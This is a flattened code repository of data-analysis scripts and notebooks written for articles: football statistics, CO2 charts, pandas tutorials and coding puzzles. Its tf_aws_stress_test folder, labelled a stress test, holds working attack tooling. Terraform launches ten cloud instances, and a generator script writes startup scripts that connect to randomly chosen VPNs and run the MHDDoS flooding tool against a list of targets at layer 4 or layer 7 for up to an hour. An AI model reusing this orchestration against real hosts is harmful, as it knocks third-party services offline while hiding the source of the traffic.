├── images ├── leagues.jpg ├── seasons.jpg ├── full_table.JPG ├── understat.JPG ├── requests_response_1.jpg └── requests_response_2.jpg ├── README.md ├── .gitignore ├── data-visualisation-bokeh.py ├── data ├── cart.csv ├── results.csv └── dead_rusnia.csv ├── luck.py ├── playground.py ├── tf_aws_stress_test ├── go.sh ├── main.tf └── generate.sh ├── add_two_numbers_as_linked_list.py ├── select_random_hashtags.py ├── longest_palindromic_substring.py ├── time-series.py ├── 538_xG_data.py ├── task_glovo.py ├── time-checks-generalized-experiment.py ├── leveraging-dataframes-in-python.py ├── update_aws_sg.py ├── time-checks.py ├── leveraging-dataframes-in-python.ipynb ├── co2_world.py ├── lambda_web_scraper.py ├── circle.html ├── data_manipulation_with_standard_lib.ipynb ├── football_why_winners_win_and_losers_loose.ipynb ├── co2-bokeh.ipynb ├── is_football_fair.ipynb └── E-Commerce_ Predicting Sales.ipynb /images/leagues.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/leagues.jpg -------------------------------------------------------------------------------- /images/seasons.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/seasons.jpg -------------------------------------------------------------------------------- /images/full_table.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/full_table.JPG -------------------------------------------------------------------------------- /images/understat.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/understat.JPG -------------------------------------------------------------------------------- /images/requests_response_1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/requests_response_1.jpg -------------------------------------------------------------------------------- /images/requests_response_2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/requests_response_2.jpg -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Notebooks for Articles 2 | 3 | Repository with random scripts and IPython Notebooks that I use to write my articles 4 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/* 2 | /*.csv 3 | *.png 4 | # *.jpg 5 | .ipynb_checkpoints 6 | .terraform* 7 | *tfstate* 8 | tf_aws_stress_test/targets_l4.txt 9 | tf_aws_stress_test/targets_l7.txt 10 | venv/ -------------------------------------------------------------------------------- /data-visualisation-bokeh.py: -------------------------------------------------------------------------------- 1 | from bokeh.io import output_file, show 2 | from bokeh.plotting import figure 3 | plot = figure(plot_width=400, tools='pan,box_zoom') 4 | plot.circle([1,2,3,4,5], [8,6,5,2,3]) 5 | output_file('circle.html') 6 | show(plot) 7 | -------------------------------------------------------------------------------- /data/cart.csv: -------------------------------------------------------------------------------- 1 | name,color,category,price,quantity 2 | t-shirt,black,top,20,1 3 | pants,white,bottom,50,1 4 | blazer,yellow,top,100,1 5 | t-shirt,red,top,15,2 6 | t-shirt,orange,top,25,1 7 | sneakers,white,footwear,100,1 8 | bracelet,green,accesories,5,3 -------------------------------------------------------------------------------- /luck.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | 3 | luck = 777 4 | actions = 100000 5 | total_hits = [] 6 | 7 | for i in range(actions): 8 | a = np.random.randint(0, 1000) 9 | if a == luck: 10 | total_hits.append(i) 11 | 12 | 13 | print(total_hits) 14 | print(len(total_hits)) 15 | -------------------------------------------------------------------------------- /playground.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | import requests 3 | from bs4 import BeautifulSoup 4 | 5 | # df = pd.read_csv('data/data_blog.csv') 6 | 7 | res = requests.get('https://understat.com/league/La_liga/2017/') 8 | 9 | soup = BeautifulSoup(res.content) 10 | # print(soup.prettify()) 11 | 12 | table = soup.findAll('script') 13 | table 14 | -------------------------------------------------------------------------------- /data/results.csv: -------------------------------------------------------------------------------- 1 | team1,team2,goals1,goals2,result 2 | Barcelona,Granada,4,0,1 3 | Barcelona,Sevilla,1,1,X 4 | Barcelona,Athletic,2,1,1 5 | Barcelona,Cadiz,1,2,2 6 | Barcelona,Valencia,0,0,X 7 | Barcelona,Celta,3,2,1 8 | Barcelona,Girona,6,1,1 9 | Barcelona,Osasuna,1,0,1 10 | Barcelona,Real Madrid,4,0,1 11 | Barcelona,Betis,4,4,X 12 | Barcelona,Villarreal,4,2,1 -------------------------------------------------------------------------------- /tf_aws_stress_test/go.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | exec 1> /home/ubuntu/from_terraform_with_love.log 2>&1 3 | set -x 4 | 5 | cd /home/ubuntu/MHDDoS 6 | source venv/bin/activate 7 | 8 | echo 'Starting' 9 | # sudo /etc/init.d/windscribe-cli start 10 | windscribe connect "Rakia" 11 | 12 | python3 start.py TCP 8.8.8.8:80 512 60 true 13 | python3 start.py TCP 8.8.8.8:443 512 60 true 14 | 15 | windscribe disconnect 16 | deactivate 17 | echo 'Finished, shutting down...' 18 | 19 | # sudo shutdown -------------------------------------------------------------------------------- /add_two_numbers_as_linked_list.py: -------------------------------------------------------------------------------- 1 | # Definition for singly-linked list. 2 | class ListNode(object): 3 | def __init__(self, x): 4 | self.val = x 5 | self.next = None 6 | 7 | class Solution: 8 | def addTwoNumbers(self, l1, l2, c = 0): 9 | # Fill this in. 10 | 11 | l1 = ListNode(2) 12 | l1.next = ListNode(4) 13 | l1.next.next = ListNode(3) 14 | 15 | l2 = ListNode(5) 16 | l2.next = ListNode(6) 17 | l2.next.next = ListNode(4) 18 | 19 | result = Solution().addTwoNumbers(l1, l2) 20 | while result: 21 | print result.val, 22 | result = result.next 23 | # 7 0 8 24 | -------------------------------------------------------------------------------- /select_random_hashtags.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import pandas as pd 3 | 4 | 5 | file = 'data/hashtags.csv' 6 | 7 | data = pd.read_csv(file) 8 | 9 | amount_of_tags = 27 10 | selected_tags = [] 11 | top_limit = len(data) 12 | 13 | for i in range(top_limit): 14 | rand_ind = np.random.randint(0, top_limit) 15 | to_select = data.iloc[rand_ind, 0] 16 | selected_tags.append(to_select) 17 | data.drop([rand_ind], axis=0) 18 | if len(selected_tags) == amount_of_tags: 19 | break 20 | 21 | for i in range(amount_of_tags): 22 | print('#'+selected_tags[i]) 23 | -------------------------------------------------------------------------------- /longest_palindromic_substring.py: -------------------------------------------------------------------------------- 1 | class Solution: 2 | def longest_palindrome(self, s): 3 | if s == s[::-1]: 4 | return s 5 | max_len = 2 6 | winners = [] 7 | for i in range(len(s)): 8 | for ln in range(i+1, len(s)+1): 9 | ss = s[i:ln] 10 | if ss == ss[::-1]: 11 | if len(ss) >= max_len: 12 | max_len = len(ss) 13 | winners.append(ss) 14 | 15 | winners = [x for x in winners if len(x) == max_len] 16 | 17 | return winners 18 | 19 | st = "aamamamnaa" 20 | print(Solution().longest_palindrome(st)) 21 | 22 | -------------------------------------------------------------------------------- /tf_aws_stress_test/main.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | aws = { 4 | source = "hashicorp/aws" 5 | version = "~> 3.27" 6 | } 7 | } 8 | 9 | required_version = ">= 0.14.9" 10 | } 11 | 12 | provider "aws" { 13 | profile = "default" 14 | region = "eu-west-1" 15 | } 16 | 17 | resource "aws_instance" "android_terminator" { 18 | 19 | count = 10 20 | 21 | ami = "ami-0e0f48e669d76f99d" 22 | instance_type = "t2.micro" 23 | security_groups = ["no-security-no-cry"] 24 | user_data = "${file("go_${count.index}.sh")}" 25 | 26 | tags = { 27 | Name = "article-${count.index}" 28 | } 29 | volume_tags = { 30 | "Name" = "article-${count.index}" 31 | } 32 | } -------------------------------------------------------------------------------- /time-series.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | import numpy as np 3 | import matplotlib.pyplot as plt 4 | import glob 5 | import seaborn as sns 6 | 7 | sns.set() 8 | 9 | pattern = 'data/madrid*.csv' 10 | csv_files = glob.glob(pattern) 11 | 12 | frames = [] 13 | 14 | for csv in csv_files: 15 | df = pd.read_csv(csv, index_col='date', parse_dates=True) 16 | frames.append(df) 17 | 18 | df = pd.concat(frames) 19 | 20 | df_time = df[['O_3', 'PM10']][df['station'] == 28079008].dropna() 21 | 22 | df.sort_values 23 | 24 | df_plot = df_time.resample('M').mean() 25 | plt.plot(df_plot) 26 | plt.title('O3 and PM10 air polution levels') 27 | plt.ylabel('micrograms per cubic meter (mg/m3)') 28 | plt.xticks(rotation=45) 29 | plt.show() 30 | -------------------------------------------------------------------------------- /538_xG_data.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | 3 | URL = 'https://projects.fivethirtyeight.com/soccer-api/club/spi_matches.csv' 4 | data = pd.read_csv(URL) 5 | 6 | championship = data[data['league'] == 'English League Championship'] 7 | championship = championship[['season', 'date', 'team1', 'team2', 'xg1', 'xg2']] 8 | championship['xga1'] = championship['xg2'] 9 | championship['xga2'] = championship['xg1'] 10 | 11 | home_data = championship[['season', 'team1', 'xg1', 'xga1']] 12 | away_data = championship[['season', 'team2', 'xg2', 'xga2']] 13 | 14 | home_groupped = home_data.groupby(['season', 'team1']).mean().reset_index() 15 | away_groupped = away_data.groupby(['season', 'team2']).mean().reset_index() 16 | 17 | final_data = pd.merge(home_groupped, away_groupped, left_on=['team1','season'], right_on=['team2','season']) 18 | final_data.drop(['team2'], axis='columns', inplace=True) 19 | final_data.rename({'team1': 'team', 'xg1': 'xG_h', 'xga1': 'xGA_h', 'xg2': 'xG_a', 'xga2': 'xGA_a'}, axis='columns', inplace=True) 20 | 21 | final_data.to_csv('data/xGA_championship.csv', index=False) 22 | print("Done!") -------------------------------------------------------------------------------- /task_glovo.py: -------------------------------------------------------------------------------- 1 | heights = [9,8,7,8,9,5,6] 2 | # heights = [1,9,3,3,5,5,3,5,7,3] 3 | ln = len(heights) 4 | total_sum = 0 5 | 6 | 7 | def find_hole(heights): 8 | first_max = 0 9 | ind_first_max = 0 10 | second_max = 0 11 | ind_second_max = 0 12 | # find borders 13 | for ind, h in enumerate(heights): 14 | if h > first_max: 15 | ind_first_max, first_max = ind_second_max, second_max 16 | ind_first_max, first_max = ind, h 17 | elif (h >= second_max and ind != ind_first_max): 18 | ind_second_max, second_max = ind, h 19 | 20 | # if borders create a hole, calculate the volume 21 | if abs(ind_first_max-ind_second_max) > 1: 22 | reverse = [] 23 | for h in heights[ind_first_max:ind_second_max+1]: 24 | reverse.append(second_max-h) 25 | part_sum = sum([x for x in reverse if x>0]) 26 | else: 27 | part_sum = 0 28 | 29 | return part_sum, ind_first_max, ind_second_max 30 | 31 | 32 | start = 0 33 | finish = ln 34 | # go through the list looking for holes and calculating its volumes till the end 35 | while finish - start > 1: 36 | part_sum, ind_first_max, ind_second_max = find_hole(heights[start:finish]) 37 | total_sum += part_sum 38 | start += max([ind_second_max,ind_first_max]) 39 | 40 | 41 | print("Total sum: "+str(total_sum)) -------------------------------------------------------------------------------- /tf_aws_stress_test/generate.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | rm -rf go_*.sh 3 | 4 | # Params 5 | LAYER=$1 6 | TARGETS=$2 7 | 8 | VPNS=("Goodbye Lenin" "Hermitage" "Shnur" "Rakia") 9 | MAX_INDEX=$(expr ${#VPNS[@]} - 1) 10 | COUNTER=0 11 | 12 | while IFS="" read -r TARGET || [ -n "${TARGET}" ] 13 | do 14 | RAND=$(shuf -i 0-${MAX_INDEX} -n 1) 15 | VPN=${VPNS[${RAND}]} 16 | if [[ $LAYER -eq 4 ]] 17 | then 18 | # Template 19 | cat << EOF > go_$COUNTER.sh 20 | #!/bin/bash 21 | exec 1> /home/ubuntu/from_terraform_with_love.log 2>&1 22 | set -x 23 | 24 | cd /home/ubuntu/MHDDoS 25 | source venv/bin/activate 26 | 27 | echo 'Starting' 28 | windscribe connect "$VPN" # vpn name as param from list 29 | 30 | python3 start.py $TARGET 256 3600 true # from list 31 | 32 | windscribe disconnect 33 | deactivate 34 | echo 'Finished, shutting down...' 35 | 36 | sudo shutdown 37 | EOF 38 | fi 39 | if [[ $LAYER -eq 7 ]] 40 | then 41 | # Template 42 | cat << EOF > go_$COUNTER.sh 43 | #!/bin/bash 44 | exec 1> /home/ubuntu/from_terraform_with_love.log 2>&1 45 | set -x 46 | 47 | cd /home/ubuntu/MHDDoS 48 | source venv/bin/activate 49 | 50 | echo 'Starting' 51 | windscribe connect "$VPN" # vpn name as param from list 52 | 53 | python3 start.py $TARGET 5 256 "" 200 60 true # from list 54 | 55 | windscribe disconnect 56 | deactivate 57 | echo 'Finished, shutting down...' 58 | 59 | sudo shutdown 60 | EOF 61 | fi 62 | let COUNTER=${COUNTER}+1 63 | done < ${TARGETS} -------------------------------------------------------------------------------- /time-checks-generalized-experiment.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import matplotlib.pyplot as plt 3 | import seaborn as sns 4 | 5 | sns.set() 6 | 7 | amount_of_checks = 1000 # how many times a person checks her/his phone 8 | 9 | np.random.seed(666) 10 | a = np.random.binomial(amount_of_checks, 0.044, size=10000) 11 | p_a_2 = np.sum(a > 1) / 10000 12 | p_a_3 = np.sum(a > 2) / 10000 13 | p_a_4 = np.sum(a > 3) / 10000 14 | print(" === Assuming average person checks their phone " + str(amount_of_checks) + " times per day === ") 15 | print("Probability of seeing 'lucky time' two times per day: " 16 | + str(p_a_2) + ", three: " + str(p_a_3) + ", four: " + str(p_a_4)) 17 | 18 | n_sequential = 0 19 | size = amount_of_checks 20 | sample = 1000000 21 | 22 | for s in range(sample): 23 | rare = np.random.random(size=size) < 0.044 24 | n_rare = np.sum(rare) 25 | if n_rare > 1: 26 | for i in range(size): 27 | if i == size-1: 28 | break 29 | elif rare[i] is True & rare[i+1] is True: 30 | n_sequential += 1 31 | if s % 1000 == 0: 32 | print('Processed: ' + str(s) + ' samples.') 33 | 34 | print("Probability of two rare events one after another: " + str(float(n_sequential/sample))) 35 | 36 | bins = np.arange(0, max(a) + 1.5) - 0.5 37 | 38 | # plt.subplot(3, 1, 1) 39 | plt.hist(a, bins=bins, normed=True, color='red') 40 | plt.title('Phone usage') 41 | plt.xlabel('Amount of "lucky hours spotted during the day"') 42 | plt.ylabel('Probability') 43 | plt.show() 44 | -------------------------------------------------------------------------------- /leveraging-dataframes-in-python.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | import numpy as np 3 | 4 | cols = ['col0', 'col1', 'col2', 'col3', 'col4'] 5 | rows = ['row0', 'row1', 'row2', 'row3', 'row4'] 6 | data = np.random.randint(0, 100, size=(5, 5)) 7 | df = pd.DataFrame(data, columns=cols, index=rows) 8 | 9 | df.head() 10 | 11 | df['col1']['row1'] 12 | 13 | df.loc['row4', 'col2'] 14 | 15 | df.iloc[4, 2] 16 | 17 | df_new = df[['col1', 'col2']] 18 | df_new.head(3) 19 | 20 | df_new = df[['col1', 'col2']][1:4] 21 | df_new.head(3) 22 | 23 | df['col0'] 24 | df.loc[:, 'col0'] 25 | df.iloc[:, 0] 26 | 27 | df['col3'][2:5] 28 | 29 | df.loc['row1':'row4', :] 30 | df.iloc[1:4, :] 31 | 32 | df.loc[:, 'col1':'col4'] 33 | df.iloc[:, 1:4] 34 | 35 | df.loc['row1':'row4', 'col1':'col4'] 36 | df.iloc[1:4, 1:4] 37 | 38 | df.loc['row2':'row4', ['col1', 'col3']] 39 | df.iloc[[2, 4], 0:4] 40 | 41 | df[df['col1'] > 20] 42 | # assigning variable also works 43 | condition = df['col1'] > 20 44 | df[condition] 45 | 46 | df[(df['col1'] > 25) & (df['col3'] < 30)] # logical and 47 | df[(df['col1'] > 25) | (df['col3'] < 30)] # logical or 48 | df[~(df['col1'] > 25)] # logical not 49 | 50 | df.iloc[3, 3] = 0 51 | df.iloc[1, 2] = np.nan 52 | df.iloc[4, 0] = np.nan 53 | df['col5'] = 0 54 | df['col6'] = np.NaN 55 | df.head() 56 | 57 | df.loc[:, df.all()] 58 | 59 | df.loc[:, df.any()] 60 | 61 | df.loc[:, df.isnull().any()] 62 | 63 | df.loc[:, df.notnull().all()] 64 | 65 | df_na_any = df.dropna(how='any') # if any value in a row is NaN it will be dropped 66 | df_na_all = df.dropna(how='all', axis=1) # if all values in a row are NaN it will be dropped 67 | 68 | # Find a column based on another 69 | df['col1'][df['col2'] > 35] 70 | 71 | df['col1'][df['col2'] > 35] += 5 72 | df[df['col1'] > 35] 73 | 74 | df['new_col'] = df['col4'].apply(lambda n: n*2) 75 | 76 | df.index.str.upper() 77 | 78 | df.index.map(str.lower) 79 | 80 | red_vs_blue = {0:'blue', 12:'red'} 81 | 82 | df['color'] = df['col3'].map(red_vs_blue) 83 | df.head() 84 | 85 | df['col7'] = df['col3'] + df['col4'] 86 | df.head() -------------------------------------------------------------------------------- /update_aws_sg.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import boto3 3 | from botocore.exceptions import ClientError 4 | 5 | GROUP_ID = 'GROUP-ID' 6 | RULE_DESCRIPTION = 'Rule Description' 7 | NEW_IP = requests.get('http://checkip.amazonaws.com').text[:-1] + '/32' 8 | OLD_IP = '' 9 | 10 | ec2 = boto3.client('ec2') 11 | 12 | try: 13 | response = ec2.describe_security_groups(GroupIds=[GROUP_ID]) 14 | except ClientError as e: 15 | print(e) 16 | 17 | sg = response['SecurityGroups'] 18 | for el in range(len(sg)): 19 | if sg[el]['GroupId'] == GROUP_ID: 20 | ip_pems = sg[el]['IpPermissions'] 21 | for i in range(len(ip_pems)): 22 | if ip_pems[i]['IpRanges'][0]['Description'] == RULE_DESCRIPTION: 23 | OLD_IP = ip_pems[i]['IpRanges'][0]['CidrIp'] 24 | print('Old office Ip %s' % OLD_IP) 25 | 26 | if (OLD_IP != NEW_IP) & (OLD_IP != ''): 27 | try: 28 | d = ec2.revoke_security_group_ingress( 29 | GroupId = GROUP_ID, 30 | IpPermissions=[ 31 | { 32 | 'FromPort': 3306, 33 | 'ToPort': 3306, 34 | 'IpProtocol': 'tcp', 35 | 'IpRanges': [ 36 | { 37 | 'CidrIp': OLD_IP, 38 | 'Description': RULE_DESCRIPTION 39 | } 40 | ] 41 | } 42 | ] 43 | ) 44 | print('Ingress successfully removed %s' % d) 45 | except ClientError as e: 46 | print(e) 47 | 48 | try: 49 | d = ec2.authorize_security_group_ingress( 50 | GroupId = GROUP_ID, 51 | IpPermissions=[ 52 | { 53 | 'FromPort': 3306, 54 | 'ToPort': 3306, 55 | 'IpProtocol': 'tcp', 56 | 'IpRanges': [ 57 | { 58 | 'CidrIp': NEW_IP, 59 | 'Description': RULE_DESCRIPTION 60 | } 61 | ] 62 | } 63 | ] 64 | ) 65 | print('Ingress successfully set %s' % d) 66 | except ClientError as e: 67 | print(e) 68 | -------------------------------------------------------------------------------- /time-checks.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import matplotlib.pyplot as plt 3 | import seaborn as sns 4 | 5 | sns.set() 6 | 7 | np.random.seed(666) 8 | a_min = np.random.binomial(28, 0.044, size=10000) 9 | p_a_min_2 = np.sum(a_min > 1) / 10000 10 | p_a_min_3 = np.sum(a_min > 2) / 10000 11 | p_a_min_4 = np.sum(a_min > 3) / 10000 12 | print(" === Assuming average person checks their phone 28 times per day === ") 13 | print("Probability of seeing 'lucky time' two times per day: " 14 | + str(p_a_min_2) + ", three: " + str(p_a_min_3) + ", four: " + str(p_a_min_4)) 15 | 16 | a_avg = np.random.binomial(47, 0.044, size=10000) 17 | p_a_avg_2 = np.sum(a_avg > 1) / 10000 18 | p_a_avg_3 = np.sum(a_avg > 2) / 10000 19 | p_a_avg_4 = np.sum(a_avg > 3) / 10000 20 | print(" === Assuming average person checks their phone 47 times per day === ") 21 | print("Probability of seeing 'lucky time' two times per day: " 22 | + str(p_a_avg_2) + ", three: " + str(p_a_avg_3) + ", four: " + str(p_a_avg_4)) 23 | 24 | a_max = np.random.binomial(86, 0.044, size=10000) 25 | p_a_max_2 = np.sum(a_max > 1) / 10000 26 | p_a_max_3 = np.sum(a_max > 2) / 10000 27 | p_a_max_4 = np.sum(a_max > 3) / 10000 28 | print(" === Assuming average person checks their phone 86 times per day === ") 29 | print("Probability of seeing 'lucky time' two times per day: " 30 | + str(p_a_max_2) + ", three: " + str(p_a_max_3) + ", four: " + str(p_a_max_4)) 31 | 32 | n_sequential = 0 33 | size = 28 34 | sample = 100000 35 | 36 | for _ in range(sample): 37 | rare = np.random.random(size=size) < 0.044 38 | n_rare = np.sum(rare) 39 | if n_rare > 1: 40 | for i in range(size): 41 | if i == size-1: 42 | break 43 | elif rare[i] is True & rare[i+1] is True: 44 | n_sequential += 1 45 | 46 | print("Probability of two rare events one after another: " + str(float(n_sequential/sample))) 47 | 48 | bins_min = np.arange(0, max(a_min) + 1.5) - 0.5 49 | bins_avg = np.arange(0, max(a_avg) + 1.5) - 0.5 50 | bins_max = np.arange(0, max(a_max) + 1.5) - 0.5 51 | 52 | # plt.subplot(3, 1, 1) 53 | plt.hist(a_min, bins=bins_min, normed=True, color='red') 54 | plt.title('Minimum phone usage') 55 | plt.xlabel('Amount of "lucky hours spotted during the day"') 56 | plt.ylabel('Probability') 57 | plt.show() 58 | 59 | # plt.subplot(3, 1, 2) 60 | plt.hist(a_avg, bins=bins_avg, normed=True, color='green') 61 | plt.title('Average phone usage') 62 | plt.xlabel('Amount of "lucky hours spotted during the day"') 63 | plt.ylabel('Probability') 64 | plt.show() 65 | 66 | # plt.subplot(3, 1, 3) 67 | plt.hist(a_max, bins=bins_max, normed=True, color='blue') 68 | plt.title('Maximum phone usage') 69 | plt.xlabel('Amount of "lucky hours spotted during the day"') 70 | plt.ylabel('Probability') 71 | plt.show() 72 | 73 | -------------------------------------------------------------------------------- /leveraging-dataframes-in-python.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 3, 6 | "metadata": {}, 7 | "outputs": [], 8 | "source": [ 9 | "import pandas as pd\n", 10 | "import numpy as np" 11 | ] 12 | }, 13 | { 14 | "cell_type": "code", 15 | "execution_count": 18, 16 | "metadata": {}, 17 | "outputs": [], 18 | "source": [ 19 | "cols = ['col1', 'col2', 'col3', 'col4', 'col5']\n", 20 | "rows = ['row1', 'row2', 'row3', 'row4', 'row5']\n", 21 | "df = pd.DataFrame(np.random.randint(0,100,size=(5, 5)), columns=cols, index=rows)" 22 | ] 23 | }, 24 | { 25 | "cell_type": "code", 26 | "execution_count": 20, 27 | "metadata": {}, 28 | "outputs": [ 29 | { 30 | "data": { 31 | "text/html": [ 32 | "
\n", 33 | "\n", 46 | "\n", 47 | " \n", 48 | " \n", 49 | " \n", 50 | " \n", 51 | " \n", 52 | " \n", 53 | " \n", 54 | " \n", 55 | " \n", 56 | " \n", 57 | " \n", 58 | " \n", 59 | " \n", 60 | " \n", 61 | " \n", 62 | " \n", 63 | " \n", 64 | " \n", 65 | " \n", 66 | " \n", 67 | " \n", 68 | " \n", 69 | " \n", 70 | " \n", 71 | " \n", 72 | " \n", 73 | " \n", 74 | " \n", 75 | " \n", 76 | " \n", 77 | " \n", 78 | " \n", 79 | " \n", 80 | " \n", 81 | " \n", 82 | " \n", 83 | " \n", 84 | " \n", 85 | " \n", 86 | " \n", 87 | " \n", 88 | " \n", 89 | " \n", 90 | " \n", 91 | " \n", 92 | " \n", 93 | " \n", 94 | " \n", 95 | " \n", 96 | " \n", 97 | " \n", 98 | " \n", 99 | "
col1col2col3col4col5
row18172332589
row28439198555
row36168767060
row43697758492
row57248193569
\n", 100 | "
" 101 | ], 102 | "text/plain": [ 103 | " col1 col2 col3 col4 col5\n", 104 | "row1 81 72 33 25 89\n", 105 | "row2 84 39 19 85 55\n", 106 | "row3 61 68 76 70 60\n", 107 | "row4 36 97 75 84 92\n", 108 | "row5 72 48 19 35 69" 109 | ] 110 | }, 111 | "execution_count": 20, 112 | "metadata": {}, 113 | "output_type": "execute_result" 114 | } 115 | ], 116 | "source": [ 117 | "df.head()" 118 | ] 119 | }, 120 | { 121 | "cell_type": "code", 122 | "execution_count": null, 123 | "metadata": {}, 124 | "outputs": [], 125 | "source": [] 126 | } 127 | ], 128 | "metadata": { 129 | "kernelspec": { 130 | "display_name": "Python 3", 131 | "language": "python", 132 | "name": "python3" 133 | }, 134 | "language_info": { 135 | "codemirror_mode": { 136 | "name": "ipython", 137 | "version": 3 138 | }, 139 | "file_extension": ".py", 140 | "mimetype": "text/x-python", 141 | "name": "python", 142 | "nbconvert_exporter": "python", 143 | "pygments_lexer": "ipython3", 144 | "version": "3.6.3" 145 | } 146 | }, 147 | "nbformat": 4, 148 | "nbformat_minor": 2 149 | } 150 | -------------------------------------------------------------------------------- /co2_world.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | import numpy as np 3 | 4 | from bokeh.io import curdoc 5 | from bokeh.plotting import figure 6 | from bokeh.models import HoverTool, ColumnDataSource, CategoricalColorMapper, Slider 7 | from bokeh.palettes import Spectral6 8 | from bokeh.layouts import widgetbox, row 9 | 10 | # Data cleaning and preparation 11 | data = pd.read_csv('data/co2_emissions_tonnes_per_person.csv') 12 | data.head() 13 | 14 | gapminder = pd.read_csv('data/gapminder_tidy.csv') 15 | gapminder.head() 16 | 17 | df = gapminder[['Country', 'region']].drop_duplicates() 18 | data_with_regions = pd.merge(data, df, left_on='country', right_on='Country', how='inner') 19 | data_with_regions = data_with_regions.drop('Country', axis='columns') 20 | data_with_regions.head() 21 | 22 | new_df = pd.melt(data_with_regions, id_vars=['country', 'region']) 23 | new_df.head() 24 | 25 | columns = ['country', 'region', 'year', 'co2'] 26 | new_df.columns = columns 27 | 28 | upd_new_df = new_df[new_df['year'].astype('int64') > 1963] 29 | upd_new_df.info() 30 | upd_new_df = upd_new_df.sort_values(by=['country', 'year']) 31 | upd_new_df['year'] = upd_new_df['year'].astype('int64') 32 | 33 | df_gdp = gapminder[['Country', 'Year', 'gdp']] 34 | df_gdp.columns = ['country', 'year', 'gdp'] 35 | df_gdp.info() 36 | 37 | final_df = pd.merge(upd_new_df, df_gdp, on=['country', 'year'], how='left') 38 | final_df = final_df.dropna() 39 | final_df.head() 40 | 41 | np_co2 = np.array(final_df['co2']) 42 | np_gdp = np.array(final_df['gdp']) 43 | np.corrcoef(np_co2, np_gdp) 44 | 45 | # Creating visualization app with Bokeh.io 46 | regions_list = final_df.region.unique().tolist() 47 | color_mapper = CategoricalColorMapper(factors=regions_list, palette=Spectral6) 48 | 49 | # Make the ColumnDataSource: source 50 | source = ColumnDataSource(data={ 51 | 'x': final_df.gdp[final_df['year'] == 1964], 52 | 'y': final_df.co2[final_df['year'] == 1964], 53 | 'country': final_df.country[final_df['year'] == 1964], 54 | 'region': final_df.region[final_df['year'] == 1964], 55 | }) 56 | 57 | # Save the minimum and maximum values of the gdp column: xmin, xmax 58 | xmin, xmax = min(final_df.gdp), max(final_df.gdp) 59 | 60 | # Save the minimum and maximum values of the co2 column: ymin, ymax 61 | ymin, ymax = min(final_df.co2), max(final_df.co2) 62 | 63 | # Create the figure: plot 64 | plot = figure(title='Gapminder Data for 1964', plot_height=600, plot_width=1000, 65 | x_range=(xmin, xmax), 66 | y_range=(ymin, ymax), y_axis_type='log') 67 | 68 | # Add circle glyphs to the plot 69 | plot.circle(x='x', y='y', fill_alpha=0.8, source=source, legend='region', 70 | color=dict(field='region', transform=color_mapper), 71 | size=7) 72 | 73 | # Set the legend.location attribute of the plot 74 | plot.legend.location = 'bottom_right' 75 | 76 | # Set the x-axis label 77 | plot.xaxis.axis_label = 'Income per person (Gross domestic product per person adjusted for differences in ' \ 78 | 'purchasing power in international dollars, fixed 2011 prices, PPP based on 2011 ICP)' 79 | 80 | # Set the y-axis label 81 | plot.yaxis.axis_label = 'CO2 emissions (tonnes per person)' 82 | 83 | # Make a slider object: slider 84 | slider = Slider(start=min(final_df.year), end=max(final_df.year), step=1, value=min(final_df.year), title='Year') 85 | 86 | 87 | def update_plot(attr, old, new): 88 | # set the `yr` name to `slider.value` and `source.data = new_data` 89 | yr = slider.value 90 | 91 | new_data = { 92 | 'x': final_df.gdp[final_df['year'] == yr], 93 | 'y': final_df.co2[final_df['year'] == yr], 94 | 'country': final_df.country[final_df['year'] == yr], 95 | 'region': final_df.region[final_df['year'] == yr], 96 | } 97 | source.data = new_data 98 | 99 | # Add title to figure: plot.title.text 100 | plot.title.text = 'Gapminder data for %d' % yr 101 | 102 | 103 | # Attach the callback to the 'value' property of slider 104 | slider.on_change('value', update_plot) 105 | 106 | # Create a HoverTool: hover 107 | hover = HoverTool(tooltips=[('Country', '@country'), ('GDP', '@x'), ('CO2 emission', '@y')]) 108 | 109 | # Add the HoverTool to the plot 110 | plot.add_tools(hover) 111 | 112 | # Make a row layout of widgetbox(slider) and plot and add it to the current document 113 | layout = row(widgetbox(slider), plot) 114 | curdoc().add_root(layout) 115 | 116 | 117 | -------------------------------------------------------------------------------- /data/dead_rusnia.csv: -------------------------------------------------------------------------------- 1 | date,Personnel 2 | 01/03/2022,410 3 | 02/03/2022,130 4 | 03/03/2022,760 5 | 04/03/2022,150 6 | 05/03/2022,850 7 | 06/03/2022,1000 8 | 07/03/2022,600 9 | 08/03/2022,400 10 | 09/03/2022,500 11 | 10/03/2022,500 12 | 11/03/2022,500 13 | 12/03/2022,300 14 | 13/03/2022,100 15 | 14/03/2022,200 16 | 15/03/2022,1200 17 | 16/03/2022,300 18 | 17/03/2022,200 19 | 18/03/2022,200 20 | 19/03/2022,200 21 | 20/03/2022,300 22 | 21/03/2022,300 23 | 22/03/2022,300 24 | 23/03/2022,300 25 | 24/03/2022,200 26 | 25/03/2022,300 27 | 26/03/2022,300 28 | 27/03/2022,500 29 | 28/03/2022,400 30 | 29/03/2022,200 31 | 30/03/2022,100 32 | 31/03/2022,200 33 | 